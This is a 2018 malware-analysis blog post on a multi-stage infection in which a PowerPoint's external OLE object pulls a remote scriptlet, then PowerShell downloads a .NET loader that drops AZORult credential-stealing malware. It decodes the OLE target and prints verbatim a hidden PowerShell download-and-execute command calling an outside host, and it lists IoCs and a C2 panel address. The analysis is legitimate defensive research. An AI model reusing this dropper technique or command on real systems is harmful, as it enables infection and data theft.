Friday, November 16, 2018

Microsoft Powerpoint as Malware Dropper

Nowadays Microsoft office documents are often used to propagate Malware acting like dynamic droppers. Microsoft Excel within macros or Microsoft Word with user actions (like links or external OLE objects) are the main player in this "Office Dropping Arena". When I figured out that a Microsoft Powerpoint was used to drop and to execute a Malicious payload I was amazed, it's not so common (at least on my personal experiences), so I decided to write a little bit about it.

The "attack-path" is very close to what it's observable on modern threats since years: eMail campaign with attached document and actionable text on it. At the beginning the Microsoft Powerpoint presentation looked like a white blank page but performing a very interesting and hidden connection to: hxxps://a.doko.moe/wraeop.sct

Analysing the Microsoft Powerpoint structure it rises on my eyes the following slide structure

Stage 1: Microsoft PowerPoint Dropping Website
An external OLEobject (compatibility 2006) was available on that value:
Target="%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko%2Emo%65%2Fwr%61%65o%70%2E%73%63%74"  
Decoding that string from HEX to ASCII is much more readable:

scrIPT:hxxps://a.dolo.moe/wraeop.sct

An external object is downloaded and executed like a script on the victim machine. The downloaded file (wraeop.sct) represents a Javascript code reporting the Stage 2 of the infection process. It's showed as follows:

Stage 2: Executed Javascript
Decoding the 3.6K script appears clear that one more Stage is involved in the infection process. The following code is the execution path that drives Stage 2 to Stage 3.
var run = new ActiveXObject('WSCRIPT.Shell').Run(powershell  -nologo -executionpolicy bypass -noninteractive -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://batteryenhancer.com/oldsite/Videos/js/DAZZI.exe', '%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe'); Start-Process '%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe' ); 
The script downloads a file named: AZZI.exe and saves it by a new name: VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe on a System temporary directory for running it. The downloaded PE Executable is a .NET file created by ExtendedScript Toolkit (according to compilation time) on 2018-11-13 15:21:54 and submitted few hours later on VirusTotal.

Stage 3: .NET file 
The Third stage uses an internal resource (which happens to be an image) to read and execute additional code: the final payload or Stage 4. In other words Stage 3 reads an image placed under the internal resource of PE File, extracts and executes it. The final payload looks like AzoRult Malware. The evidence comes from traffic analysis where the identified pattern sends (http POST) data on browser history and specific crafted files under User - AppData to specific php pages. Moreover the Command and control admin panel (hxxps://ominigrind.ml/azzi/panel/admin.php) looks like AZOrultV3.


Stage4: AZORult evidences


I hope you had fun on this, I did! It was super interesting to see Attacker's creativity and the way the act to include malicious contents into Office Documents. Microsoft should probably take care of this and try to filter or to ask permissions before include external contents, but still this will not be a complete solution (on my personal point of view). A more deep and invasive action would be needed to check the remote content. Stay tuned! 

IoC:
Original Powerpoint: 6ae5583ec767b7ed16aaa45068a1239a827a6dae95387d5d147c58c7c5f71457
wraeop.sct: 4f38fcea4a04074d2729228fb6341d0c03363660f159134db35b4d259b071bb0
download1: hxxps://a.dolo.moe/wraeop.sct
download2: hxxp://batteryenhancer.com
DAZZI.exe: c26de4d43100d24017d82bffd1b8c5f1f9888cb749ad59d2cd02ef505ae59f40
Resource Img: 965b74e02b60c44d75591a9e71c94e88365619fe1f82208c40be518865a819da
C2: hxxps://ominigrind.ml/azzi/index.php